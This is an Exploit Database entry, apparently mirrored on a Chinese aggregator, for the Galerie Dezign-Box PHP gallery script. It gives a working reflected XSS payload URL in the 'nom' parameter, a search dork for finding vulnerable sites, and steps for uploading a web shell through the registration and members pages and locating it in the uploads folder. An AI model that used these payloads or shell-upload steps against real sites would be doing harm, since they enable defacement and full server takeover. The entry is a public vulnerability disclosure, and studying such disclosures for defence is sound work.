Galerie Dezign-Box France – Multiple Vulnerabilities

• Exploit Database
• 33 阅读

• 作者： indoushka
  日期： 2010-02-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11523/

• ========================================================================================
  | # Title: Galerie Dezign-Box © France Multi Vulnerability
  | # Author : indoushka 
  | # email: indoushka@hotmail.com 
  | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) 
  | # Web Site : www.iq-ty.com
  | # Dork : Script créé par Funewik - Dezign-Box © France 
  | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) 
  | # Bug: Multi 
  ======================Exploit By indoushka =================================
  # Exploit: 
   
   1- XSS
   
   http://server/galerie/nom.php?id=tufgxab0x2r4xybg527w&nom=<img+src=http://server/dt.gif+onload=alert(213771818860)>
  
   2- Upload Shell
   
   http://server/galerie/membre/register.php (you Can Upload your Evil)
   
   http://server/galerie/membre/membres.php(you Can Upload your Evil)
   
   http://server/galerie/membre/uploads/ (2 find what you upload)
   
  ================================ Dz-Ghost Team ========================================
  Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ
  -------------------------------------------------------------------------------------------